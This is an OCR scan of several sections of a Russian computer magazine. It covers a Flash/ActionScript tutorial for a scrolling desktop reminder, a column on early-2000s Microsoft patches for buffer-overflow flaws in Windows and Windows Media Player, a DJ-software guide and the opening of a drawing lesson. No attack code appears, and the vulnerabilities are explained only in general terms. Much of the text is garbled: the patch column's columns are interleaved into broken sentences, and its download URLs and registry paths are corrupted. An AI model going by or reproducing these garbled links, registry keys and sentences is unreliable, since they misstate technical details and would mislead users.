черный прямоугольник? Посмотри на 
него очень внимательно и запомни его! 
Это Рабочая область твоего мувика. 
Вызови панель “Символ” - Окно/Пане- 
ли/Символ (Window/Panels/Character 
или СИТ). На ней устанавливаем 
шрифт - Arial Cyr, размер - 30, цвет - 
#СССССС (ну, это мне, извращенцу, 
нравится такое сочетание :) - ты име- 
ешь полное право на выбор других цве- 
тов и размеров). Теперь мышкой акти- 
вируй инструмент “Текст”, кликай по ра- 
бочей области и в появившейся белой 
рамке набирай: “Моя задница самая 
всемогущественная задница в мире!”. 
Теперь тебе нужна (и потом, кстати, то- 
же пригодится) панель “Параметры тек- 
ста”. Если ее нет, то иди в меню Ок- 
но/Панели/Параметры текста (вообще- 
то, все панели, которые нам сегодня 
пригодятся, лежат там же: Окно/Пане- 
ли/). В Параметрах текста для набран- 
ной тобой строки ты должен установить: 


Вот скажи мне, приятель, как на духу, что натянуто на твой дескт 
Фотография любимой бензопилы по кличке "Кастратор”? 


просто никакой фантазии не хватит, 
чтоб описать, какие немереные удобст- 
ва можно наворотить... 


тип текста - Dynamic Text; вид - Single 
Line; переменную назовем “51” (без 
кавычек, разумеется - имя переменной 
дается для того, чтобы в ActionScript мы 
могли обращаться к этому полю, какк 
текстовой переменной). Выбери инст- 
румент Стрелка (Arrow - клавиша \/). Им 
выдели строку, щелкнув по ней один 
раз. Нажав F8, преобразуем то, что вы- 
делено, в символ. В открывшемся 
окошке в поле “имя” пиши “String”, ос- 
тавь стоящий по умолчанию флажок 
“поведение” на “Клип видеофрагмента” 
(Movie Clip). Сделали мы это потому, что 
Bo Flash’e из всех символов только для 
клипов можно задавать какие-либо ха- 
рактеристики в ActionScript. Для того 
чтобы обращаться к клипу в скриптах, 
надо задать ему имя. 


Вызови панель Окно/Панели/Обра- 
зец. Во вкладке Копия задай имя для 
клипа “str”. Перетащи мышкой Ha Pa- 
бочей области получившийся клип го- 
ризонтально вправо так, чтобы он был 
за ее пределами. А на ней самой со- 
здай еще одно поле текста с теми же 
параметрами шрифта, что и первое. 
Только не просто кликай, как в про- 
шлый раз, а растяни это поле на всю 
Рабочую область. Постарайся сделать 
так, чтобы первая строчка второго по- 
ля была на том же уровне, что и сим- 
вол str. Здесь никакого текста ручка- 
ми тебе не придется набирать - все 
сделаем автоматически, так что не 
нервничай :). В Параметрах текста 
укажи: Тип текста - Dynamic Text; вид - 
Multiline; имя переменной - “str2”; по- 
ставь галочку напротив “На нов.стр.”, 
тогда в случае, когда длина текста 
больше длины строки, текст авто- 
матически будет переноситься на 
новую строку. 
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При помощи инструмента Пря- 

моугольник (клавиша В) рисуем 
прямоугольник :). ровно над верхней 
половиной Рабочей ‘област”»Выделяй 
его Стрелкой (клавиша\/) изпреобра- - 
зуй.в символ, HO на этот раз этот сим- 
вол по поведению должен быть KHOM- 
кой. Назови его “MyButton” :). 
Выделяй Стрелкой все три чуда на Ра- 
бочей области; зажав Shift. Аккуратно 
жми F8, объединяя их все в символ 
“Мат”=ыаоме clip по-ловедению-Де- 
nai Ctrl+L -ВЫзовешь:библиотеку. Не 
бойся этого слова, читать чтб-либо, 
кроме любимого журнала, я тебя.не 


поля. Напоследок, на всякий случай, 


сделаем еще вот что - выдели на ра- 


ббчей области кнопку и перемести ее 
путем Модификация/Выстраива- 
ние/Переместить на самый верх. С 
рисованием покончено. Ты рад? Я то- 
же. Переходим к созданию скрипта. 


Кликай два раза по пиктограмме у кли- 
пазМат в библиотеке. Теперь посмот- 
ри На верхнюю часть рабочего окна 
видеофрагмента. Ты видишь полоски 
с делениями. Это временная шкала. У 
тебя пока есть один уровень кадров 
(Уровень 1 или Layer 1). На этом уров- 
не утебя будут рисунки и символы 
(собственно, они у тебя там уже есть - 
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алена A Mine! 
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заставляю. Там будут отображены три 
символа, что ты сейчас сотворил (если 
ты не ошибся, то там будут символы 
Main, MyButton, String). 


Кликни два раза на пиктограмме 
кнопки. Перед тобой появился тот са- 
мый прямоугольник с рамкой, кото- 


рый ты сделал кнопкой. Кликни два 
раза на рамке и нажми Del - рамка 
удалена, осталась лишь заливка. На 
панели Окно/Панели/Микшер, выде- 
лив перед этим все на Рабочей облас- 
ти (достаточно просто кликнуть один 
раз Стрелкой по заливке прямоуголь- 
ника), установи значение Альфа кана- 
ла - 0%. Это задает степень прозрач- 
ности объекта. Нам надо сделать кно- 
пу невидимой, поэтому мы и ставим 
ее непрозрачность нулевой. Теперь 
через библиотеку заходи в мувик 
String. Заметил белый крестик в цент- 
ре? Тогда иди в меню Модифика- 
ция/Трансформирование/Редактиро- 
вание центра и просто перетащи этот 
крестик так, чтобы он оказался ровно 
на левом краю текстового поля. По- 
следний штрих - в клипе Мат верни 
мувик String на место и уже извест- 
ным методом перемести центр в ле- 
вый верхний угол второго текстового 


посмотри, первый кадр отличается от 
всех остальных - показано, что он не 
пустой). Кликни правой кнопкой на 
третьем кадре и выбери там Создание 
чистого ключевого кадра (Insert Blank 
Keyframe), потом нажми Del. Что изме- 
нилось? А изменилось вот что - твой 
первый кадр растянулся на два кадра. 
Добавь еще один уровень кадров, рас- 


положи его над первым. Первые два 
кадра у него сделай отдельными чис- 
тыми ключевыми. 
Двойным щелчком по второму из них 
вызывай окно Асйоп$. Слева, в списке 
Базовых операций, выбирай Переход, 
(goto). Установки по умолчанию (пе- 
рейти к первому кадру текущей сцены) 
тебя вполне устроят. С первым кадром 
будет чуть посложнее. Переходи в экс- 
пертный режим (Ctrl+E) и вводи код: 
if ((str._width+str._x)>=0) { 
str._x=str._x-5; 
} else { 
str._x=500; 
} 
Объясняю. Переменные str._width и 
str._X это, соответственно, ширина и 
горизонтальная координата клипа str. 
Насколько ты помнишь, в нем наша 
строка. Так вот, этот скрипт сдвигает 
нашу строку влево до тех пор, пока она 
не скроется за левой границей Рабо- 


чей области, после чего возвращает ее 
в исходную позицию. Скрипт выполня- 
ется по достижении соответствующего 
кадра. Т.к. мы поставили ссылку со 
второго кадра на первый, то это дейст- 
вие будет выполняться бесконечно :). 
Теперь кликай правой кнопкой на той 
самой прямоугольной кнопке у тебя на 
Рабочей области и в контекстном меню 
выбирай Операции (Actions). В экс- 
пертном режиме вводи следующее: 
on (rollOver) { 
_root.main.str2=_root.main.str.str1; 
_root.main.str.str1=””; 
} 
on (rollOut) { 
_root.main.str.str1=_root.main.str2; 
_root.main.str2=””; 


} 


Заметь, конструкции On (...) {...} не OT- 
деляются точкой с запятой, как опера- 
торы. Этот скрипт просто и доступно 
говорит о том, что при событии мыши 
rollOver (курсор над кнопкой) текст 
строки $11 перенесется (не копирует- 
ся, а именно перенесется) в str2, a 
при событии rollOut (курсор He над 
кнопкой) текст переносится обратно. 


Теперь сохраняйся и дави 
Ctrl+Shift+F12, появится окно настро- 
ек публикации. Там нужно указать два 
формата: Flash (.swf) и HTML (.html). 
Настройки по умолчанию для этих 
форматов тебе вполне подойдут. Для 
того чтобы публиковать, очевидно не- 
обходимо кликнуть кнопку Публикация 
(Publish). Уйми течь ферментов из ро- 
товой полости :) и кликай ее. Оба 
файла появятся там же, куда ты со- 
хранялся. 

Глотни пивка, ибо сделать осталось 
самую малость - запихнуть твою напо- 
миналку на Рабочий стол. Залезай в 
свойства Рабочего стола, врубай 
Active Desktop и указывай путь к свое- 
му детищу. 

Удобства ради, советую немного усо- 
вершенствовать текст страницы. По- 
мести при помощи средств самого 
html прописанную флешку в правый 
верхний угол экрана (самым баналь- 
ным align=right или таблицей - как же- 
лаешь) и объявляй всеобщий сбор 
перцев и перчинок к твоему монитору. 
Это лишь начало, но все равно пусть 
знают, кто здесь кто! 

И да пребудет с тобой 

Великий Flash! 
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Алексей Б. Беляев (alexey@spez.fatal.ru) 
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ПОПЕЗНЫЕ ОБНОБПЕННЯ OT MICROSOFT 


Наверно, нет Ha свете более глючной и незащищенной 
операционки, чем винды :). Но мы все равно любим их (по-своему) 
и продолжаем ими пользоваться. 


мелкомягким приходится Качаются дистрибутивы во 0311967: ОБНОВЛЕНИЕ 
отыскивать свои же глюки (хотя, временную папку, откуда по СИСТЕМЫ БЕЗОПАСНОСТИ 
думается, они намеренно их и завершению скачивания будут 
оставили :)) и устранять их, выпуская установлены. Если ты непродвинутый Любой из заинтересовавшихся 
различные апдейты для повышения чел, то тебе придется ждать, пока содержимым твоего компа может 
работоустойчивости. скачаются и заинсталлятся все использовать переполнение буфера 
обновления. Но, надеюсь, ты все-таки для атаки. А это нам не нужно вовсе. 
ДОБЫВАНИЕ ЗАПЛАТОК наш чел и будешь выбирать только Проблема buffer overflow появляется 
самое нужное. из-за глюков модуля управления 
Microsoft выкладывает апдейты к ресурсами файловой системы 
своим прогам на www.microsoft.com ОБНОВЛЕНИЕ ВЫХОДА (МУР), который всегда запущен под 
(что вроде понятно и ежику). Много ИЗ ЖДУЩЕГО РЕЖИМА виндами. Если буфер переполнен, 
плохого можно сказать в адрес этого то после посылки намеренно 
сайта, но все же возможность скачать Кому хочется выключать комп, когда неправильного запроса на твоем 
и установить апдейты они довели до надо буквально на часок отойти? Тут компе может быть запущена какая- 
уровня «проще некуда». За тебя 99% приходит на помощь StandBy режим нибудь программа от лица админа, 
работы по выбору объектов для (режим ожидания, или Sleep). Но все т.е. тебя (люди, не сидите под 
даунлоуда сделает Windows Update. ли девайсы продолжают работать рутом!). Если атакующий не дурак, 


он создаст нового пользователя для 
себя. После этого физически 


Чтобы апдейты складывались в заданную тобой папку, пропиши ее админов одного компа станет два - 


5 =; = " ты и этот некто :). Если ты м Lub 
на U4.windowsupdate.microsoft.com/ru/default.asp в разделе "Личная Не а. 

= 5 = что установленный и настроенныи 
настройка Wndows Update’. 


файрвол тебя спасет, то ты слишком 
уверен в себе. Файрвол только 
снизит риск, но не спасет 
полностью, ведь он тоже работает 


При ее запуске Explorer сразу откроет после вывода компа из ждущего под управлением Win. Мелкомягкие 
страницу режима в Win2k? Оказывается, были не в восторге от данной 

v4, windowsupdate. microsoft.com/ru, далеко не все. Если такая проблема проблемы и поспешили ее устранить 
default.asp (на месте ги стоит присутствует и у тебя, то качай (какой удар по хацкерам :)). Апдейт 
аббревиатура языка, который исправление этой ошибки виндов по убирает дырки введением проверки 
является основным в виндовсе). В адресу: МУР на прочность. Скачать данный 
левом фрейме открытой страницы http://download. microsoft.com апдейт для различных версий 

будет меню, а справа, после твоего download/win2000platform/Patch виндов можно по следующим 
согласия и нажатия «Выбор Q311537/NT5/EN-US адресам: 

обновлений для установки», будет 49311537 W2K_SP3_X86_EN.exe. 

проводиться проверка твоей системы После скачивания данного апдейта Win2k: 

(займет не более минуты) и выбор тех проблем по возвращению рабочего http://www. microsoft.com/Downloads, 
обновлений, которые ты еще не состояния из сна возникать не Release.asp?ReleaselD=37555 
соизволил поставить. должно. 
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| WinXP: 
http://www. micros: 
Для проверки установки данного 
апдейта понадобится заглянуть в 
реестр и найти следующие ключи 
(различные для разных виндов): 


Windows 2000 SP2: 

Для проверки установки: 

НКЕУ ГОСАЕ_МАСНИМЕ\ЗОРТ\ММАВЕ\ 
Microsoft\Updates\Windows 
2000\SP3\Q311967 


Для проверки работы Ha аккаунтах 
пользователей: 
HKEY_LOCAL_MACHINE\SOFTWARE\ 
Microsoft\Updates\Windows 
2000\SP3\Q311967\Filelist 


Для Windows ХР соответственно: 
HKLM\Software\Microsoft\Updates\ 
Windows XP\SP1\Q31 1967 
HKLM\Software\Microsoft\Updates\ 
Windows XP\SP1\Q311967\Filelist 


ПРОИГРЫВАТЕЛЬ WINDOWS MEDIA 7.1 
Незабытым оказался и встроенный в 
винды \ЛИпаом/$ Media Player. В 


предыдущих версиях B WMP имел 
место неконтролируемый буфер, 
который позволял работать 
приложениям, спрятанным в ASX 
(Active Stream Redirector) файлах. При 
помощи добавления в АЗХ-файлы 
нужного кода нападающий мог 
запустить его в то время, когда 
пользователь будет спокойно 
проигрывать клип. ASX - один из 
поддерживаемых \/МР форматов. 
АЗХ-файлы не содержат никаких 
потоковых данных. Наоборот, они 
передают Windows Media Player’y 
информацию о местонахождении 
конкретного потокового клипа в сети 
и средствах его обработки. Один из 
буферов используется для чтения 
данных из АЗХ-файла, при этом длина 
их не проверяется. Вот тебе и бага. 
Сидение под админским аккаунтом 
расширит рамки дестроя на всю 
систему. 

Обновление, которое обезопасит тебя 
и твой комп при просмотре ASX- 
файлов, содержится в новой версии 
Window Media Player. Если ты юзаешь 
WMP 7.0, то скачать апдейт можно 


отсюда: 
http://download. microsoft.com 
downloac me er/jwmp7/1/7.1 


W982KMe/EN-US/mp71.exe. 
Владельцам WMP 6.4 понадобится 
залезть на страницу 

http://www. microsoft.com/Downloads 
| easelD=29921 

и скачать оттуда все нужные 
дополнения до апдейта. 


В э.азр? 


Ребята из Microsoft’a все-таки 
пытаются сделать из виндов 
надежную операционку. Что, 
собственно говоря, у них неплохо 
получается. Сравни хотя бы 
дырявость 98-х и уже некоторую 
надежность и стабильность Win2k? 
Главное, не забывать узнавать об 
обновлениях и вовремя их ставить. В 
этом мы тебе и будем помогать из 


номера в номер :). 
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Читайте в июльском номере . :| 
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Dj_Tender (dj_tender@email.ru) & Donor (donor@real.xakep.ru) 


LET’S PARTY! виртуально, а ты будешь действовать одной мышкой. И 

Хай, хот бойз-н-герлз! Без сомнения, ты ходишь в клубы, на получится нормально, поверь. А намонстрячившись в виртуале, 
различные акции и прочие тусовки. Там, естественно, играют уже сможешь попробовать себя и в реале, а к тому времени и 
ди-джеи, опупенно крутые мэны (иногда вумэны) в модном денег на девайсы скопишь :). 


прикиде и наушниках, возвышающиеся над танцполом на своем 
ди-джейском месте. Они мастерски крутят винил и диски, они : 
рубят бешеные бабки (правда, это только так кажется), . НЕ 
пообщаться с ними - честь для рядового тусовщика. Ты, 
наверное, не раз думал что-то типа: «Ух, ты! Супер! Я бы так 
не смог» - или, наоборот - «Подумаешь, пластинки крутить! 
Пустите меня к вертушкам - я тоже чего-нибудь смонстрячу!». Е 
Но это все - бред. Узнать, что на самом деле значит - быть : 
Орем, и в чем заключается ди-джейский креатифф, можно 
только попробовав. Как? Читай и узнаешь. 

С ЧЕГО НАЧАТЬ 


РЕАЛ VS ВИРТУАЛ Прежде чем качать софту и настраивать харду, давай определимся, 
«Ни фига себе, сказанул! Попробовать? Да, один микшерный чего ты хочешь: попробовать тихонечко, сразу стереть все следы и 
пульт стоит 200 - 600 зеленых да еще вертушки за 600 баков потом отмазываться от соседей, что гвалт за стеной - не твоих рук 
или СО-проигрыватель за 1100 президентов, эффектор за 615 дело; устроить колбасный нон-стоп у себя дома или в деревенском 
зелени да наушники за 130, плюс по мелочи еще на пару штук клубе или все же научиться чему-то реальному. 

yes (стойка для техники, кейс, иглы) - неплохая прибавочка к В любом случае, у тебя есть два пути: поставить вторую звуковуху 
стипендии получается!» - скажешь ты. Верно. Ho ведь у тебя или не ставить. Зачем нужна вторая звуковуха? Ну, ты же ди- 
есть куча металлического хлама с гордым именем «комп» под джеить собрался, то есть треки сводить, значит, нужно, чтобы 


столом, и он тебя в очередной раз выручит. Серьезно! Реально — текущая композиция ревела через усилок в зал, а вторая звучала у 
почувствовать себя каким-нибудь Диско Супер Стар можно без тебя в наушниках. Поэтому твоя основная крутая карточка со 
дополнительных капиталовложений и даже почти не ковыряясь — стереовыходом будет сливать музон в динамики для публики, а Ta, 
в брюхе своего кремниевого другана. Все будет происходить что похуже, - в наушники только для тебя. Так что если настроен 
се SFO откапывай оставшуюся от апгрейда ESS’ky и пихай в 
свободный слот. 

Второй вариант - не запариваясь с дополнительной платкой, 
пустить правый канал стереовыхода на колонки (моновыход), а 
левый - на наушники. Все то же самое, но звук везде будет моно, а 
следовательно, не профессионально (записать микс на какой- 
нибудь носитель невозможно), но для домашней дискотеки сойдет. 
Второй вариант с половиной - вообще забить на наушники и 
сводить, так сказать, визуально. Звук будет стерео, но Dj из тебя 
получится никакой :(. 

Да! Чуть не забыл. Тебе придется закаматозить свой супер-пупер 
скоростной CD, чтобы он не разгонялся каждый раз до 
сверхзвуковых скоростей, иначе при считывании mp3 с диска будут 
PPT пробуксовки, что-в.ди-джейском деле недопустимо. Hy и, конечно, 
не забудь закупить побольше CD с пар3’шками или накачать из 
Инета кучу продвинутых композиций, иначе чего сводить-то? 
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МЕГА НОН-СТОП 

Итак, ты просто хочешь замутить улетную дискотеку для друзей и 
подруг у себя в пятикомнатной квартире. Не вопрос! Что от 
тебя требуется? Обеспечить длиннющий микс, чтобы переходы 
между треками не были заметны и не раздражали дансящую 
публику. Технически в этом и состоит задача ди-джея - 
совместить треки и добиться плавных или быстрых, или каких- 
нибудь еще, но, главное, гармоничных переходов. Пиплы будут 
слушать, нормально воспринимать и колбаситься, правда, не 
факт, что им будет интересно (хотя, если ты действительно dj, то 
ты должен чувствовать публику). Но это и неважно, если музыка 
- лишь фон твоей пати. 

В общем, там, где от «ди-джея» не требуется никакого напряга и 
креатива, например, в деревенском клубе :), вполне прокатит 
прога типа MixMeister (http://www.mixmeister.com/). Хотят 3a 
эту прогу 40 yes, но мы ее и так возьмем. Основной ее плюс в 
а ad НЕ Ц жд Бы ити а Нъши том, что она практически все сделает за тебя: сама посчитает и 
подгонит ВРМ композиций, сама сведет, сама совместит по 
уровню звучания, сама наложит эффекты. Тебе остается лишь 
подобрать треки, загнать их в плейлист и задушить цапу 
«Perform». Все, поехала вполне удобоваримая колбаса. (Скрин1.) 
Но в этом самом плюсе - основной минус проги: ничего 
интересного таким методом добиться нельзя, а ты так и не 
почувствуешь себя настоящим ди-джеем (если честно, то это 
вообще He 4)-йство), зато можешь спокойно пить ерш с огурцом 
в деревенском баре, пока доярки отплясывают :). 


БЕЗ НАУШНИКОВ 

Если ты решил играть активную роль, но умения пока маловато, 
а в компе только одна звуковуха, то лучшим выбором для тебя 
будет AtomixMP3 у 1.12 ‚но есть и другая более новая версия 2.0 
(http://www.atomixmp3.com/). Эта прога идеальна для простой 
домашней дискотеки и не заставит Dj сильно напрягаться (в 
принципе для начинающих, но уже похожих Ha 4)-ев). 


Чтобы понять, что ты, собственно, перед собой видишь и как это 
работает, прогоню тебе пару понятий: 
Каждый трек характеризуется показателем BPM (beat рег minute), 
или количеством ударов в минуту. Естественно, что у разных 
треков он различается, иногда сильнее, иногда слабее. Например, 
хаус обычно имеет бит в пределах от 90 до 140 ударов в минуту, 
транс - от 100 до 150 BPM, остальное изучай сам :). Проблема в 
том, что при сведении ВРМ следующей композиции нужно 
уравнять с ВРМ текущей, то есть чуть-чуть замедлить или 
убыстрить, иначе при переходе от одной композиции к другой 
биты наложатся, и произойдет сбой в ритме. После уравнивания 
ВРМ остаются сущие пустяки - совместить биты (удары бочки) 
р одной композиции с битами другой. 
В AtomixMP3 расчет и уравнивание BPM, а также совмещение 
битов производится автоматически, так что тебе даже 
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запариваться не придется. Дави пиктограммку папки в левом 
нижнем окошке, выбирай в древе свой сидюк и помечай в 
правом окне две композиции, которые будешь сводить. В 
окошке наверху появились две волны разных цветов, для 
одного трека и для другого. Обрати внимание на такие резкие 
острые пики - это и есть бит. (Скрин 2.) 

Теперь разберемся с кроссфейдером (crossfader). Здесь - это 
большой регулятор, расположенный горизонтально. Кроссфейдер 
нужен, чтобы плавно перейти от одной композиции к другой, то 
есть, двигая его вправо или влево, ты постепенно заглушаешь одну 
композицию и усиливаешь другую. Фейдер посередине - слышны 
оба трека, фейдер сдвинут в одно из крайних положений - играет 
только один соответствующий трек. 


В общем, выбирай, какая композиция у тебя будет первой, и 
сдвигай фейдер в соответствующую сторону. В какую? А в ту, где 
в маленьком окошечке написано название выбранной 
композиции. Теперь запускай оба трека (ты уже просек фишку, 
что для каждого трека свой набор контролзов) - обе волны 
поехали, но один трек не слышен. Замечательно! Теперь обрати 
свой ахтунг на контролзы второй композиции. Видишь там самую 
большую кнопку? Это фишка данной проги, поэтому она такая 
здоровая :). Это есть вольшебный палка. Дави на нее. Вуаля! 
ВРМ?ы сами подравнялись, а биты сами совместились (обрати 
внимание - пики двух треков сложились вместе). Иногда эту цапу 
нужно нажимать несколько раз, для лучшего эффекта сравнения. 
Слава великому Dj Comp! Теперь хватайся за фейдер и тяни его к 
другому краю, чтобы перейти от первого трека ко второму. Как 
тянуть фейдер - это дело каждого. Экспериментируй с фейдером, 
подбирай композиции. Креатиффь, в общем. (Скрин 3.) 

Кстати, синие битые диски позволяют быстро перескочить к 
началу, концу и любому другому месту композиции, в окошке 
над фейдером даны характеристики треков. Я намеренно не стал 
рассказывать тут о ручном питче, потому что без наушников и 
при такой автоматизации вообще непонятно, зачем он здесь 
нужен. Поговорим о питче позже. Также можно поковыряться в 
настройках (пиктограмма швейцарского ножика). Самое нужно 
тут, пожалуй, настройки кроссфейдера. Фейдер бывает жесткий 
(hard) - когда фейдер на середине, обе композиции играют в 
реальном звучании; мягкий (soft) - когда фейдер на середине, обе 
композиции играют приглушенно; и си-фейдер - после 
середины одна из композиций отрубается на фиг. (Скрин 4.) Ты 
на собственном опыте получил некоторое очень поверхностное 
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представление о работе ди-джея. Но, наигравшись с AtomixMP3, 
надо перелезать на что-то серьезное, и вот почему: 
Единственный плюс этой софтины - автоматическое определение 
количества ударов в минуту (ВРМ) (правда иногда не совсем 
точный), но зато у проги напрочь отсутствуют эквалайзеры и 
эффекты, то есть замутить что-то серьезное без мазы. В 
последующей версии эквалайзеры добавили, но толку от них 
никакого, так как реализованы они без задержки, а работать с 
разными частотами у разных композиций одновременно просто 
нереально. В общем, тебе понадобится три руки и три мыши :). 


VIRTUAL TURNTABLES 

Hy, если тебя проперло быть ди-джеем и ты сподобился 
воткнуть в кузов вторую звуковуху, смело качай себе рулезную 
прогу Virtual Turntables (http://www.carrot.prohosting.com/). 
На момент написания этой текстухи последняя релизная 
версия, то есть уже не бета, была у. 1.80.04. 

Теперь нужно настроить технику. Подключай к карточке 
послабее наушники, к карточке посильнее - усилок (если есть) 
и колонки. Врубай Virtual Turntables и прописывай девайсы в 
пункте меню Device. Для наушников выбирай из списка одну 
карту, а для колонок - другую, ну а если карта все же одна, то 
«вешай» на наушники и колонки левый и правый канал 
соответственно (звук будет моно). Для этого тебе понадобится 
разветвитель в гнезде :). Ура! Все готово к работе. Хотя нет... 
Дело в том, что Virtual Turntables сама не считает BPM (вернее 
сказать, есть ручной подсчет, но он, естественно, из-за 
человеческого фактора не может привести к точному результату), 
поэтому сперва тебе придется посчитать ВРМ композиций, 
которые ты будешь юзать, отдельно. Благо, есть специальная прога 
BPMResolver, которая этим занимается, а главное, отлично 
контачит с Virtual Turntables. В Properties прописывай путь к 
Virtual Turntables и обязательно укажи такой важный параметр, 
как analysis range. Как я уже говорил, треки разных стилей имеют 
разные ренджи, и это надо знать, поэтому читай доки и конфы на 
тему. Допустим, у тебя хаус-композиция, тогда выставляй 
промежуток 90-140 и стартуй анализ. BPMResolver посчитает 
BPM и сохранит файл отчета с именем в виде названия 
композиции в спепдире в формате Virtual Turntables - больше 
проблем с этим треком не будет. (Скрин 5.) 

Вернемся в Virtual Turntables. Для нее можно скачать скины и 
плагины. Для начала лучше использовать скин Jog Wheel, так 
как тут очень длинный удобный питч (pitch). Так, чтобы ты не 
подумал плохого, разберемся, что есть питч. 

Грубо говоря, питч - это такой рычажок, который ускоряет 
или замедляет вращение пластинки (скорость проигрывания 
трека для СО’ков). Питч отвечает за уравнивание показателя 
битов в минуту и сведение двух композиций. Чтобы лучше 
понять, как эта байда работает, представляй себе, как при 
нажатии на этот рычажок подкручивается пластинка. Того 
же эффекта реальные ди-джеи добиваются, подкручивая 
винил руками (кстати, очень удобно). На настоящей технике 
ди-джей подгоняет ВРМ, чуть-чуть сдвигая питч вверх или 
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вниз, и фиксирует питч в этой позиции. Теперь, если 
потянуть питч и отпустить, он вернется именно на эту 
отметку, а не на ноль (если на вертушке включить Bend). 
Дальше ди-джей тянет питч и слушает когда совпадут биты 
(в наушниках одновременно, что очень удобно, сразу два 
трэка). Отпускает питч и берется за кроссфейдер, а потом за 
эквалайзеры. Вот треки и сведены. 

Секи фишку, ты на слух должен определять бит (удары бочки), 
причем одновременно двух композиций, поэтому тренируйся: сиди 
и определяй сильную и слабую доли композиции (бочка, тарелка). 


ПОЧТИ ПРОФЕССИОНАЛ 

Ну, теперь самое время смикшировать что-нибудь в Virtual 
Turntables. УТТ-микшер всегда на столе, поэтому осталось только 
открыть нужные композиции. Вместе с композицией открывается 
виртуальная вертушка. В Virtual Turntables ты можешь 
наоткрывать до фига виртуальных вертушек, только зачем, если 
одновременно можно работать только с двумя. Итак, располагай 
вертушки и микшер, как тебе удобно (как это делают реальные 
ди-джеи, смотри в Инете), и начинай сводить (Скрин 6.) 

Сперва нужно уравнять ВРМ треков. Тащи мыша к вертушке со 
второй композицией (когда первая играет на выходе) и ищи 
кнопочку возле питча внизу вертушки. Если ты рассчитал ВРМ’ы 
треков BPMResolver’om, то вся инфа здесь уже есть. Дави цапу 
BPM, которая уравняет ВРМ”ы (там разберешся). На питче 
появится синий кусочек - это корректировка. Теперь прикладывай 
к одному уху наушники, тяни за питч и внимательно слушай биты. 
Совпали — отпускай (используя цапу Bend). Теперь хватайся за 


кроссфейдер на микшере и переводи на другой трек. Свели. Но 
это далеко не все. Настоящий ди-джейский креатифф начнется 
только тогда, когда ты заюзаешь эквалайзеры и эффекты. 
Вытягивай на свет эквалайзеры. Тут три рычажка: для 
высоких частот, для средних частот и для низких частот. 
Под каждым рычажком - кнопка Kill. Она просто вырубает 
соответствующие частоты. Большая кнопка Zero обнуляет 
все. Эквалайзер здесь удобный, так как выполнен с 
задержкой, то есть между действием и эффектом пройдет 
какое-то время, и ты успеешь, скажем, повысить низкие 
частоты у одной композиции и понизить - у другой, и еще 
останется время, чтобы подержаться за кроссфейдер. 
Сводить по частотам довольно сложно. Но здесь 
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открываются немереные просторы для креатива. Можно 
добиться, например, чтобы сперва низкие частоты первой 
композиции заменились низкими частотами второй, потом 
средние частоты, потом высокие. Тут уже тебе никто не даст 
универсальных советов, помогут только практика и опыт 
(это уже твое собственное творчество). 

К Virtual Turntables также подключаются О&-эффекты 
(Скрин 7.) С этой мулькой ты можешь замутить такие фишки, 
как, например, эмуляция винила (характерное потрескивание) 
и эффект резкого переключения эквалайзера со 100 Hz до 20 
KHz (саунд звучит, как в бочке). 

Заканчивая разборки с Virtual Turntables, скажу о ее плюсах и 
минусах: Стопудовым плюсом является очень удобный длинный 
пита. Можно довольно точно свести композиции. Радует хороший 
настраиваемый кроссфейдер. Очень грамотные эквалайзеры для ди- 
джейства на компе, так как есть задержки, и ты все успеешь сделать 
своей мышкой. Возможно подключение реального микшера, то 
есть, экономя полторы штуки грина на профессиональных CD 
вертушках, получишь почти тот же эффект. 

К минусам проги относится реализация расстановки Сие-точек - 
здесь их поставить очень сложно. Эти феньки довольно важны, 
так как позволяют пометить и зациклить кусок композиции. 
Реальные ди-джеи рисуют для этого на пластинках специальные 
метки мелом. Примочки к проге практически ничего не дают. 


СТУПЕНЬКИ К МАСТЕРСТВУ 

Перво-наперво тебе придется научиться чувствовать бит 
(ритм) композиций и научиться сводить треки до того, как 
одна композиция закончится :). Ты не раз будешь в отчаянии 
бросаться на свой комп с кулаками, но если выдержишь, 
значит, ты уже наполовину ди-джей. На освоения Dj 
мастерства уходят годы, и требуется постоянная ежедневная 
треноровка. Когда сводить треки ты будешь «на автомате», а 
наложение второго трека будет занимать минимальное время, 
ты сможешь экспериментировать с эквалайзером и эффектами. 
Когда и это ты будешь делать, не напрягаясь, ты будешь готов 
стать реальным ди-джеем. Ты уже будешь чувствовать 
настроение композиций, подходят ли композиции друг к другу 
и какое настроение несет твой микс. И, в конце концов, ты 
будешь чувствовать настроение людей на танцполе, и твоей 
микс будет меняться вместе с ним. 


ВДОГОНКУ 

Напоследок хочу пожелать тебе не останавливаться на 
достигнутом, а читать ФАКи, доки и конфы по теме, 
впитывать опыт, пробовать новые фишки, собирать 
интересные композиции. Много полезной информации на 
русском ты найдешь на http://www.djsound.ru/, на 
http://www.soundworld.ee/ ты сможешь скачать полезный 
ди-джейский софт, а также загляни на 
http://www.tonarm.ru/ и http://trance.spb.ru/. Если 
возникли какие-нибудь вопросы, смело пиши на 
dj_tender@email.ru - Dj Tender с радостью ответит на все 
твои вопросы. Удачи тебе и терпения! = 
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ручсчем в ЗРотошопе 


Vadias (painter@gameland.ru, 


С КАРАНДАШОМ НАПЕРЕВЕС 

Я не удержался и решил-таки дать несколько важных рекомен- 
даций по изображению человеческого тела по старинке, то есть 
карандашом на бумаге. Если мои скромные уроки не удовле- 
творят тебя, то никто не мешает купить книжонку по технике 
рисунка, коих в последнее время развелось нехилое множество. 
Среди них хотелось бы выделить труд профессора Ене Барчаи 
«Анатомия для художников», и замечательную книгу Берна Хо- 
гарта под названием «Динамическая анатомия для художни- 
ков». В последней рассматриваются особенности изображения 
человеческой фигуры в 

различных движениях и 

позициях, тонкости визу- 

ализации мелких деталей 

типа пальцев, бровей и 

прочих членов. 

Перед тобой рисунок, на 

котором представлены ба- 

зовые элементы тела. На- 

чинать всегда следует 

именно с такой структуры. Запомни самые значимые моменты: 
пропорции и места, где расположены суставы, чтобы в процессе 
рисования иметь представление, откуда именно растут ноги и на 
чем сидит голова. Запомни также и примерные формы различ- 
ных частей туши, например, головы - она не похожа на шар, как 
любят считать абстракционисты, а скорее на яйцо. (Рис. 1) 
Когда такая схематическая пикчура готова, можно приступать к 
наращиванию мышечной массы. Тут также немало нюансов - 
ведь мышцы не всегда находятся в одном и том же состоянии, а 
имеют привычку сокращаться при различных движениях, чем 
доставляют нам, рядовым художникам, некоторые хлопоты. 
Следующий этап - аккуратное и плавное обрисовывание наше- 
го дистрофика мускулами. Следующая пикчура показывает че- 
ловечка уже в теле. Теперь можно стирать каркас, оставшийся 
от предыдущего наброска, и работать дальше. (Рис. 2) 


С ФОТОШОПОМ В ЗУБАХ 
